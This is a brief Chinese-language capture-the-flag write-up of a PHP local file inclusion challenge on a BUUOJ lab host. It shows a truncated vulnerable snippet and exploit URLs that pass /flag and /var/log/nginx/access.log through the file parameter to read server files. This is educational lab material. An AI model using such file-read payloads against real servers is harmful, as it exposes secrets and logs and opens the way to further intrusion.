1.启动靶机
是一段php代码
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
2.代码审记
- PHP文件包含漏洞,修改url为http://12f6ee0c-2f1e-4701-912c-c0c949a8b229.node4.buuoj.cn:81/?file=/flag
3.查看nginx日志
http://12f6ee0c-2f1e-4701-912c-c0c949a8b229.node4.buuoj.cn:81/?file=/var/log/nginx/access.log查看nginx日志
4.总结
解题的关健是了解文件包含漏洞,此处属于本地文件包含,include()是php本地文件包含涉及的函数